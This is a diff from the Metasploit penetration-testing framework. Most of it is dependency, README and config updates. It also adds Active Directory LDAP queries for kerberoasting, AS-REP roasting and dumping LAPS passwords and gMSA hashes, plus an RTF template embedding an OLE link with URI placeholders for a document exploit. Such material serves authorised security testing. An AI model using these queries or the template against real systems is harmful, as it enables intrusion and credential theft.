+metasploit-payloads, 2.0.101, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
-minitest, 5.15.0, MIT
+minitest, 5.16.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.5.2, "Apache 2.0"
+msgpack, 1.6.0, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 1.1.1, MIT
+mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.0, MIT
+net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
-net-smtp, 0.3.1, "ruby, Simplified BSD"
-net-ssh, 6.1.0, MIT
+net-smtp, 0.3.2, "ruby, Simplified BSD"
+net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.6, MIT
+nokogiri, 1.13.9, MIT
 nori, 2.6.0, MIT
-octokit, 4.23.0, MIT
-openssl-ccm, 1.2.2, MIT
-openssl-cmac, 2.0.1, MIT
+octokit, 4.25.1, MIT
+openssl-ccm, 1.2.3, MIT
+openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.0, MIT
+parser, 3.1.2.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.10.0, MIT
-pg, 1.3.5, "Simplified BSD"
+pg, 1.4.4, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.7, MIT
-puma, 5.6.4, "New BSD"
+public_suffix, 5.0.0, MIT
+puma, 6.0.0, "New BSD"
 racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3.1, MIT
-rack-protection, 2.2.0, MIT
-rack-test, 1.1.0, MIT
+rack, 2.2.4, MIT
+rack-protection, 3.0.2, MIT
+rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.2, MIT
-railties, 6.1.6, MIT
+rails-html-sanitizer, 1.4.3, MIT
+railties, 6.1.7, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.23, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.5.0, MIT
-reline, 0.2.5, ruby
+regexp_parser, 2.6.0, MIT
+reline, 0.3.1, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.28, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.30, "New BSD"
+rex-exploitation, 0.1.36, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
 rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.96, "New BSD"
-rex-random_identifier, 0.1.8, "New BSD"
+rex-powershell, 0.1.97, "New BSD"
+rex-random_identifier, 0.1.9, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.39, "New BSD"
-rex-sslscan, 0.1.7, "New BSD"
+rex-socket, 0.1.43, "New BSD"
+rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.37, "New BSD"
+rex-text, 0.2.46, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.11.0, MIT
 rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.0, MIT
+rspec-expectations, 3.11.1, MIT
 rspec-mocks, 3.11.1, MIT
-rspec-rails, 5.1.2, MIT
+rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.0, MIT
-rubocop, 1.30.0, MIT
-rubocop-ast, 1.18.0, MIT
+rspec-support, 3.11.1, MIT
+rubocop, 1.37.0, MIT
+rubocop-ast, 1.22.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.3, "New BSD"
+ruby_smb, 3.2.0, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.9.1, MIT
+sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 2.2.0, MIT
-sqlite3, 1.4.2, "New BSD"
+sinatra, 3.0.2, MIT
+sqlite3, 1.5.3, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.10, MIT
+tilt, 2.0.11, MIT
 timecop, 0.9.5, MIT
 timeout, 0.3.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.4, MIT
-tzinfo-data, 1.2022.1, MIT
+tzinfo, 2.0.5, MIT
+tzinfo-data, 1.2022.5, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.1.0, MIT
+unicode-display_width, 2.3.0, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
 webrick, 1.7.0, "ruby, Simplified BSD"
@@ -188,4 +188,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.5.4, MIT
+zeitwerk, 2.6.1, MIT
@@ -3,25 +3,31 @@ Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.sv
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.

-The latest version of this software is available from: https://metasploit.com
+The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

-Bug tracking and development information can be found at:
- https://github.com/rapid7/metasploit-framework
+You can find documentation on Metasploit and how to use it at:
+ https://docs.metasploit.com/
+
+Information about setting up a development environment can be found at:
+ https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+
+Our bug and feature request tracker can be found at:
+ https://github.com/rapid7/metasploit-framework/issues

 New bugs and feature requests should be directed to:
  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
-  https://rapid7.github.io/metasploit-framework/api
+  https://docs.metasploit.com/api/

 Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -29,21 +35,20 @@ Using Metasploit
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
 reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or the [wiki].
+resources](https://metasploit.github.io), or take a look at the
+[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+page on the documentation website.

 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+See the [Dev Environment Setup][devenv] guide on GitHub, which will
 walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
 pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


-[wiki]: https://github.com/rapid7/metasploit-framework/wiki
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
-[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
-[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
 [unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -1,3 +1,6 @@
+require 'fiddle'
+Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
+
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -0,0 +1,14 @@
+openssl_conf = openssl_init
+
+[openssl_init]
+providers = provider_sect
+
+[provider_sect]
+default = default_sect
+legacy = legacy_sect
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1
@@ -0,0 +1,352 @@
+---
+queries:
+  - action: ENUM_ACCOUNTS
+    description: 'Dump info about all known user accounts in the domain.'
+    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368)(objectcategory=user)(objectClass=user))'
+    attributes:
+      - dn
+      - name
+      - description
+      - displayName
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+      - homeDirectory
+      - homeDrive
+      - profilePath
+      - memberof
+      - lastLogoff
+      - lastLogon
+      - lastLogonDate
+      - logonCount
+      - badPwdCount
+      - pwdLastSet
+      - SmartcardLogonRequired
+      - LastBadPasswordAttempt
+      - PasswordLastSet
+      - PaswordNeverExpires
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_ADCS_CAS
+    description: 'Enumerate ADCS certificate authorities.'
+    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pKIEnrollmentService)'
+    attributes:
+      - cn
+      - name
+      - cACertificateDN
+      - dNSHostname
+      - certificateTemplates
+      - objectGUID
+      - caCertificate
+    references:
+      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
+  - action: ENUM_ADCS_CERT_TEMPLATES
+    description: 'Enumerate ADCS certificate templates.'
+    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pkicertificatetemplate)'
+    attributes:
+      - cn
+      - name
+      - displayName
+      - msPKI-Cert-Template-OID
+      - msPKI-Template-Schema-Version
+      - msPKI-Enrollment-Flag
+      - msPKI-Certificate-Name-Flag
+      - msPKI-Private-Key-Flag
+      - msPKI-RA-Signature
+      - pKIExtendedKeyUsage
+    references:
+      - https://web.archive.org/web/20220818094600if_/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf
+  - action: ENUM_ADMIN_OBJECTS
+    description: 'Dump info about all objects with protected ACLs (i.e highly privileged objects).'
+    filter: '(adminCount=1)'
+    attributes:
+      - dn
+      - description
+      - distinguishedName
+      - name
+      - samAccountName
+      - objectSID
+      - objectGUID
+      - objectCategory
+      - member
+      - memberof
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_ALL_OBJECT_CATEGORY
+    description: 'Dump all objects containing any objectCategory field.'
+    filter: '(objectCategory=*)'
+    attributes:
+      - dn
+      - objectCategory
+  - action: ENUM_ALL_OBJECT_CLASS
+    description: 'Dump all objects containing any objectClass field.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - objectClass
+  - action: ENUM_COMPUTERS
+    description: 'Dump all objects containing an objectCategory or objectClass of Computer.'
+    filter: '(|(objectCategory=computer)(objectClass=computer))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystem
+      - operatingSystemVersion
+      - operatingSystemServicePack
+      - lastLogonTimestamp
+      - servicePrincipalName
+      - primaryGroupId
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_CONSTRAINED_DELEGATION
+    description: 'Dump info about all known objects that allow contrained delegation.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16777216)'
+    attributes:
+      - cn
+      - sAMAccountName
+      - objectCategory
+      - msds-allowedtodelegateto
+      - servicePrincipalName
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation
+  - action: ENUM_DNS_RECORDS
+    description: 'Dump info about DNS records the server knows about using the dnsNode object class.'
+    filter: '(objectClass=dnsNode)'
+    attributes:
+      - dc
+      - cn
+      - dnsRecord
+      - dnsTombstoned
+      - name
+    references:
+      - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
+      - https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
+  - action: ENUM_DNS_ZONES
+    description: 'Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed as without this BASEDN prefix we often miss certain entries.'
+    filter: '(objectClass=dnsZone)'
+    base_dn_prefix: 'DC=DomainDnsZones'
+    attributes:
+      - name
+      - distinguishedName
+    references:
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_DOMAIN_CONTROLLERS
+    description: 'Dump all known domain controllers.'
+    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystem
+      - operatingSystemVersion
+      - operatingSystemServicePack
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf 
+  - action: ENUM_EXCHANGE_RECIPIENTS
+    description: 'Dump info about all known Exchange recipients.'
+    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
+    attributes:
+      - dn
+      - mailNickname
+      - proxyAddresses
+      - name
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_EXCHANGE_SERVERS
+    description: 'Dump info about all known Exchange servers.'
+    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystem
+      - operatingSystemVersion
+      - operatingSystemServicePack
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_GMSA_HASHES
+    description: 'Dump info about GMSAs and their password hashes if available.'
+    filter: '(objectClass=msDS-GroupManagedServiceAccount)'
+    attributes:
+      - cn
+      - displayName
+      - msDS-ManagedPassword
+    references:
+      - https://stealthbits.com/blog/securing-gmsa-passwords/
+      - https://o365blog.com/post/gmsa/
+      - https://adsecurity.org/?p=4367
+  - action: ENUM_GROUPS
+    description: 'Dump info about all known groups in the LDAP environment.'
+    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup)(objectcategory=group))'
+    attributes:
+      - cn
+      - name
+      - description
+      - groupType
+      - memberof
+      - member
+      - owner
+      - adminCount
+      - managedBy
+      - groupAttributes
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_GROUP_POLICY_OBJECTS
+    description: 'Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.'
+    filter: '(objectClass=groupPolicyContainer)'
+    attributes:
+      - displayName
+      - gPCFileSysPath
+      - objectCategory
+      - objectGUID
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_HOSTNAMES
+    description: 'Dump info about all known hostnames in the LDAP environment.'
+    filter: '(dnsHostName=*)'
+    attributes:
+      - dn
+      - name
+      - dnsHostName
+      - serverName
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 
+  - action: ENUM_LAPS_PASSWORDS
+    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    filter: '(ms-MCS-AdmPwd=*)'
+    attributes:
+      - cn
+      - displayName
+      - ms-MCS-AdmPwd
+    references:
+      - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ldap-ldaps
+  - action: ENUM_LDAP_SERVER_METADATA
+    description: 'Dump metadata about the setup of the domain.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - defaultNamingContext
+      - domainFunctionality
+      - forestFunctionality
+      - domainControllerFunctionality
+      - dnsHostName
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_ORGROLES
+    description: 'Dump info about all known organization roles in the LDAP environment.'
+    filter: '(objectClass=organizationalRole)'
+    attributes:
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGUNITS
+    description: 'Dump info about all known organizational units in the LDAP environment.'
+    filter: '(objectClass=organizationalUnit)'
+    attributes:
+      - displayName
+      - name
+      - description
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_UNCONSTRAINED_DELEGATION
+    description: 'Dump info about all known objects that allow uncontrained delegation.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
+    attributes:
+      - cn
+      - sAMAccountName
+      - objectCategory
+      - memberof
+      - member
+    references:
+      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_ACCOUNT_DISABLED
+    description: 'Dump info about disabled user accounts.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=2)'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+  - action: ENUM_USER_ACCOUNT_LOCKED_OUT
+    description: 'Dump info about locked out user accounts.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16)'
+    attributes:
+      - cn
+      - displayName
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_ASREP_ROASTABLE
+    description: 'Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.'
+    filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://burmat.gitbook.io/security/hacking/domain-exploitation
+  - action: ENUM_USER_PASSWORD_NEVER_EXPIRES
+    description: 'Dump info about all users whose password never expires.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=65536)'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_PASSWORD_NOT_REQUIRED
+    description: 'Dump info about all users whose password never expires and whose account is still enabled.'
+    filter: '(&(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_SPNS_KERBEROAST
+    description: 'Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.'
+    filter: '(&(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
+    attributes:
+      - cn
+      - sAMAccountName
+      - servicePrincipalName
+    references:
+      - https://malicious.link/post/2022/ldapsearch-reference/
+      - https://burmat.gitbook.io/security/hacking/domain-exploitation
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties 
@@ -0,0 +1,9 @@
+---
+queries:
+#  - action: SAMPLE_ACTION
+#    description: 'A description.'
+#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
+#    filter: '(objectClass=*)'
+#    attributes:
+#      - dn
+#      - objectClass
@@ -186,6 +186,9 @@
    {
      "name": "Exchange Server 2013",
      "builds": [
+        "15.0.1497.40",
+        "15.0.1497.36",
+        "15.0.1497.33",
        "15.0.1497.28",
        "15.0.1497.26",
        "15.0.1497.24",
@@ -226,6 +229,12 @@
    {
      "name": "Exchange Server 2016",
      "builds": [
+        "15.1.2507.12",
+        "15.1.2507.9",
+        "15.1.2507.6",
+        "15.1.2375.31",
+        "15.1.2375.28",
+        "15.1.2375.24",
        "15.1.2375.18",
        "15.1.2375.17",
        "15.1.2375.12",
@@ -280,6 +289,12 @@
    {
      "name": "Exchange Server 2019",
      "builds": [
+        "15.2.1118.12",
+        "15.2.1118.9",
+        "15.2.1118.7",
+        "15.2.986.29",
+        "15.2.986.26",
+        "15.2.986.22",
        "15.2.986.15",
        "15.2.986.14",
        "15.2.986.9",
@@ -318,4 +333,4 @@
      "eol": false
    }
  ]
-}
+}
@@ -0,0 +1,30 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
+\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
+4f4c45324c696e6b000000000000000000000c0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
+70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
+8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
+0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
+000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
+}}}}
@@ -0,0 +1,297 @@
+---
+AdapFileAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- SOURCE
+# - REMARKS
+# - OBJECT_SERVER
+# - OBJECT_TYPE
+# - HANDLE_ID
+# - OBJECT_NAME
+# - UNC_NAME
+# - FILE_NAME
+# - FILE_LOCATION
+# - LOGON_ID
+# - OPERATION_ID
+- PRIMARY_USER_NAME
+- PRIMARY_DOMAIN
+- PRIMARY_LOGIN_ID
+- CLIENT_USER_NAME
+- CLIENT_DOMAIN
+- CLIENT_LOGIN_ID
+- DOMAIN
+# - RESTRICTED_SID_COUNT
+# - ACCESSES
